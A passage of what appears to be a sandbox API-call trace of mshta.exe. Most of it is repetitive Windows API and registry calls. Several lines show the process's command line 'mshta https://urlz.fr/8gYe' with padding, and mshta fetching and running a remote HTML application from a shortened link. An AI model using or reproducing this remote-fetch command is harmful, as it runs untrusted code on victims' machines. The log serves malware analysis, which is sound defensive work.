e\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x16\x62\xc2\x15\x54\xf7\x3b", lpUsedDefaultChar=0x0) returned 256
[0081.790] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0081.790] GetLastError () returned 0x0
[0081.790] SetLastError (dwErrCode=0x0)
[0081.790] GetLastError () returned 0x0
[0081.790] SetLastError (dwErrCode=0x0)
[0081.790] GetLastError () returned 0x0
[0081.790] SetLastError (dwErrCode=0x0)
[0081.790] GetLastError () returned 0x0
[0081.790] SetLastError (dwErrCode=0x0)
[0081.790] GetLastError () returned 0x0
[0081.790] SetLastError (dwErrCode=0x0)
[0081.790] GetLastError () returned 0x0
[0081.790] SetLastError (dwErrCode=0x0)
[0081.790] GetLastError () returned 0x0
[0081.790] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.791] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.791] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.791] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.791] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.791] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.791] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.791] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.791] SetLastError (dwErrCode=0x0)
[0081.791] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.792] SetLastError (dwErrCode=0x0)
[0081.792] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.793] SetLastError (dwErrCode=0x0)
[0081.793] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.794] SetLastError (dwErrCode=0x0)
[0081.794] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.795] SetLastError (dwErrCode=0x0)
[0081.795] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.796] SetLastError (dwErrCode=0x0)
[0081.796] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.797] SetLastError (dwErrCode=0x0)
[0081.797] GetLastError () returned 0x0
[0081.798] SetLastError (dwErrCode=0x0)
[0081.798] GetLastError () returned 0x0
[0081.798] SetLastError (dwErrCode=0x0)
[0081.798] GetLastError () returned 0x0
[0081.798] SetLastError (dwErrCode=0x0)
[0081.798] GetLastError () returned 0x0
[0081.798] SetLastError (dwErrCode=0x0)
[0081.798] GetLastError () returned 0x0
[0081.798] SetLastError (dwErrCode=0x0)
[0081.798] GetLastError () returned 0x0
[0081.798] SetLastError (dwErrCode=0x0)
[0081.798] GetLastError () returned 0x0
[0081.798] SetLastError (dwErrCode=0x0)
[0081.798] GetLastError () returned 0x0
[0081.798] SetLastError (dwErrCode=0x0)
[0081.798] GetLastError () returned 0x0
[0081.799] SetLastError (dwErrCode=0x0)
[0081.799] GetLastError () returned 0x0
[0081.799] SetLastError (dwErrCode=0x0)
[0081.799] GetLastError () returned 0x0
[0081.799] SetLastError (dwErrCode=0x0)
[0081.799] GetLastError () returned 0x0
[0081.799] SetLastError (dwErrCode=0x0)
[0081.799] GetLastError () returned 0x0
[0081.799] SetLastError (dwErrCode=0x0)
[0081.799] GetLastError () returned 0x0
[0081.799] SetLastError (dwErrCode=0x0)
[0081.799] GetLastError () returned 0x0
[0081.800] SetLastError (dwErrCode=0x0)
[0081.800] GetLastError () returned 0x0
[0081.800] SetLastError (dwErrCode=0x0)
[0081.800] GetLastError () returned 0x0
[0081.800] SetLastError (dwErrCode=0x0)
[0081.800] GetLastError () returned 0x0
[0081.800] SetLastError (dwErrCode=0x0)
[0081.800] GetLastError () returned 0x0
[0081.800] SetLastError (dwErrCode=0x0)
[0081.800] GetLastError () returned 0x0
[0081.800] SetLastError (dwErrCode=0x0)
[0081.801] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x62aef) returned 0x0
[0081.802] GetLastError () returned 0x0
[0081.802] SetLastError (dwErrCode=0x0)
[0081.802] GetLastError () returned 0x0
[0081.802] SetLastError (dwErrCode=0x0)
[0081.802] GetLastError () returned 0x0
[0081.868] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14
[0081.869] GetSystemDefaultLCID () returned 0x409
[0081.870] GetVersionExW (in: lpVersionInformation=0x3bef5c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77e4e36c, dwMinorVersion=0x77e4e0d2, dwBuildNumber=0x7440afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3bef5c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0081.870] GetUserDefaultUILanguage () returned 0x409
[0081.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x3beeac, cchData=16 | out: lpLCData="\x03") returned 16
[0081.871] GetKeyboardLayoutList (in: nBuff=32, lpList=0x3beedc | out: lpList=0x3beedc) returned 1
[0081.871] GetSystemMetrics (nIndex=4096) returned 0
[0081.871] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x3bf000 | out: phkResult=0x3bf000*=0x9c) returned 0x0
[0081.871] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x3bf004 | out: phkResult=0x3bf004*=0x98) returned 0x0
[0081.871] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x3befc0 | out: phkResult=0x3befc0*=0x0) returned 0x2
[0081.871] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x3befc0 | out: phkResult=0x3befc0*=0x0) returned 0x2
[0081.871] RegCloseKey (hKey=0x0) returned 0x6
[0081.871] RegCloseKey (hKey=0x0) returned 0x6
[0081.871] RegCloseKey (hKey=0x9c) returned 0x0
[0081.871] RegCloseKey (hKey=0x98) returned 0x0
[0081.871] GetModuleFileNameW (in: hModule=0x73ed0000, lpFilename=0x3bee68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e
[0081.871] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a
[0081.871] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b
[0081.871] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d
[0081.871] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f
[0081.871] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e
[0081.871] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc1cc
[0081.871] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc1cd
[0081.871] GetDC (hWnd=0x0) returned 0x7010944
[0081.872] SHCreateShellPalette (hdc=0x0) returned 0x40808f0
[0081.872] GetPaletteEntries (in: hpal=0x40808f0, iStart=0x0, cEntries=0x100, pPalEntries=0x7440a494 | out: pPalEntries=0x7440a494) returned 0x100
[0081.872] SHGetInverseCMAP (in: pbMap=0x74408a7c, cbMap=0x4 | out: pbMap=0x74408a7c) returned 0x0
[0081.872] GetDeviceCaps (hdc=0x7010944, index=38) returned 32409
[0081.872] ReleaseDC (hWnd=0x0, hDC=0x7010944) returned 1
[0081.872] GetCurrentProcessId () returned 0x9ac
[0081.872] _vsnprintf (in: _DstBuf=0x3bf3ac, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x3bf074 | out: _DstBuf="#MSHTML#PERF#000009AC") returned 21
[0081.872] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#000009AC") returned 0x0
[0081.873] GetVersionExW (in: lpVersionInformation=0x3bf090*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x3f37b0, dwMinorVersion=0x100, dwBuildNumber=0x40ddd0, dwPlatformId=0x3f0000, szCSDVersion="A") | out: lpVersionInformation=0x3bf090*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0081.873] GetModuleHandleW (lpModuleName="advapi32") returned 0x76490000
[0081.873] GetProcAddress (hModule=0x76490000, lpProcName="EventWrite") returned 0x77e80c59
[0081.873] GetProcAddress (hModule=0x76490000, lpProcName="EventRegister") returned 0x77e5f6ba
[0081.873] GetProcAddress (hModule=0x76490000, lpProcName="EventUnregister") returned 0x77e79241
[0081.873] EtwEventRegister () returned 0x0
[0081.873] EtwRegisterTraceGuidsW () returned 0x0
[0081.873] EtwRegisterTraceGuidsW () returned 0x0
[0081.873] EtwEventRegister () returned 0x0
[0081.874] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0x3bee5c | out: lpdwHandle=0x3bee5c) returned 0x0
[0081.874] GetModuleHandleW (lpModuleName=0x0) returned 0x60000
[0081.874] GetModuleFileNameW (in: hModule=0x60000, lpFilename=0x3bee68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0081.874] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe"
[0081.876] GetCurrentProcessId () returned 0x9ac
[0081.876] GetCurrentProcessId () returned 0x9ac
[0081.878] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xb8
[0081.878] GetLastError () returned 0x0
[0081.889] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xfc
[0081.889] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1e0000
[0081.891] RegCloseKey (hKey=0x42) returned 0x0
[0081.891] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76220000
[0081.891] GetProcAddress (hModule=0x76220000, lpProcName="RegisterApplicationRestart") returned 0x7625b53c
[0081.891] lstrlenA (lpString="https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC") returned 41
[0081.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3f2c86, cbMultiByte=-1, lpWideCharStr=0x591da0, cchWideChar=42 | out: lpWideCharStr="https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC") returned 42
[0081.891] RegisterApplicationRestart (pwzCommandline="https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC", dwFlags=0x0) returned 0x0
[0081.891] GetProcAddress (hModule=0x73ed0000, lpProcName="RunHTMLApplication") returned 0x73f2e710
[0081.891] GetCommandLineW () returned="mshta https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC"
[0081.892] OleInitialize (pvReserved=0x0) returned 0x0
[0081.908] IsWindow (hWnd=0x0) returned 0
[0081.908] RegisterClassW (lpWndClass=0x3bf714) returned 0xc1d1
[0081.908] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x60000, lpParam=0x74409680) returned 0x2021c
[0081.909] NtdllDefWindowProc_W () returned 0x0
[0081.909] NtdllDefWindowProc_W () returned 0x1
[0081.910] NtdllDefWindowProc_W () returned 0x0
[0081.912] NtdllDefWindowProc_W () returned 0x0
[0081.913] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x2021c, hMenu=0x0, hInstance=0x60000, lpParam=0x74409680) returned 0x2021e
[0081.913] NtdllDefWindowProc_W () returned 0x0
[0081.913] NtdllDefWindowProc_W () returned 0x1
[0081.913] NtdllDefWindowProc_W () returned 0x0
[0081.913] NtdllDefWindowProc_W () returned 0x0
[0081.913] SetWindowLongW (hWnd=0x2021e, nIndex=-16, dwNewLong=-2100363264) returned 114229248
[0081.914] NtdllDefWindowProc_W () returned 0x0
[0081.914] NtdllDefWindowProc_W () returned 0x0
[0081.914] NtdllDefWindowProc_W () returned 0x0
[0081.914] NtdllDefWindowProc_W () returned 0x0
[0081.914] NtdllDefWindowProc_W () returned 0x0
[0081.914] NtdllDefWindowProc_W () returned 0x0
[0081.914] SetWindowPos (hWnd=0x2021e, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0081.914] NtdllDefWindowProc_W () returned 0x0
[0081.914] NtdllDefWindowProc_W () returned 0x0
[0081.916] NtdllDefWindowProc_W () returned 0x0
[0081.916] NtdllDefWindowProc_W () returned 0x0
[0081.916] NtdllDefWindowProc_W () returned 0x0
[0081.917] SendMessageW (hWnd=0x2021e, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0
[0081.917] NtdllDefWindowProc_W () returned 0x0
[0081.917] NtdllDefWindowProc_W () returned 0x0
[0081.917] PathRemoveArgsW (in: pszPath="https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC" | out: pszPath="https://urlz.fr/8gYe")
[0081.917] PathRemoveBlanksW (in: pszPath="https://urlz.fr/8gYe" | out: pszPath="https://urlz.fr/8gYe")
[0081.917] PathUnquoteSpacesW (in: lpsz="https://urlz.fr/8gYe" | out: lpsz="https://urlz.fr/8gYe") returned 0
[0081.918] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="https://urlz.fr/8gYe", ppmk=0x3bf774*=0x0, dwFlags=0x1 | out: ppmk=0x3bf774*=0x41ffc0) returned 0x0
[0081.950] CoCreateInstance (in: rclsid=0x74009770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7408b75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x744096d4 | out: ppv=0x744096d4*=0x424f28) returned 0x0
[0081.955] DllGetClassObject (in: rclsid=0x422df4*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75d3ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3bea24 | out: ppv=0x3bea24*=0x74408cb0) returned 0x0
[0081.957] CreateActCtxW (pActCtx=0x3be778) returned 0x424124
[0081.959] ActivateActCtx (in: hActCtx=0x424124, lpCookie=0x3be748 | out: hActCtx=0x424124, lpCookie=0x3be748) returned 1
[0081.959] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74960000
[0081.962] DeactivateActCtx (dwFlags=0x0, ulCookie=0x12100001) returned 1
[0081.962] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb
[0081.963] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32
[0081.963] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8
[0081.963] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32
[0081.964] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x3be3a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0081.964] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3be5b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0081.964] GetCurrentProcess () returned 0xffffffff
[0081.964] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x3be7b8, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9
[0081.964] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe"
[0081.964] FindAtomW (lpString="TridentEnableHiRes") returned 0x0
[0081.964] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x3be394, pvData=0x3be3a0, pcbData=0x3be39c*=0x4 | out: pdwType=0x3be394*=0x0, pvData=0x3be3a0, pcbData=0x3be39c*=0x4) returned 0x2
[0081.964] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x3be30c | out: phkResult=0x3be30c*=0x1d4) returned 0x0
[0081.965] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x3be310 | out: phkResult=0x3be310*=0x1d0) returned 0x0
[0081.965] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x3be2cc | out: phkResult=0x3be2cc*=0x0) returned 0x2
[0081.965] RegOpenKeyExW (in: hKey=0x1d4, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x3be2cc | out: phkResult=0x3be2cc*=0x0) returned 0x2
[0081.965] RegCloseKey (hKey=0x0) returned 0x6
[0081.965] RegCloseKey (hKey=0x0) returned 0x6
[0081.965] RegCloseKey (hKey=0x1d4) returned 0x0
[0081.965] RegCloseKey (hKey=0x1d0) returned 0x0
[0081.966] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x74408cd4, dwReserved=0x0 | out: ppSM=0x74408cd4*=0x425e70) returned 0x0
[0081.970] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x42565c, dwReserved=0x0 | out: ppSM=0x42565c*=0x426ed8) returned 0x0
[0081.971] IInternetSecurityManager:SetSecuritySite (This=0x426ed8, pSite=0x425664) returned 0x0
[0081.971] IUnknown:AddRef (This=0x425664) returned 0x28
[0081.971] IUnknown:QueryInterface (in: This=0x425664, riid=0x75ad61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x3be674 | out: ppvObject=0x3be674*=0x425668) returned 0x0
[0081.971] IServiceProvider:QueryService (in: This=0x425668, guidService=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x75adf13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x426f00 | out: ppvObject=0x426f00*=0x0) returned 0x80004002
[0081.971] IServiceProvider:QueryService (in: This=0x425668, guidService=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x75adf12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x426efc | out: ppvObject=0x426efc*=0x0) returned 0x80004002
[0081.971] IServiceProvider:QueryService (in: This=0x425668, guidService=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75acc484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x426ef8 | out: ppvObject=0x426ef8*=0x0) returned 0x80004002
[0081.971] IUnknown:Release (This=0x425668) returned 0x0
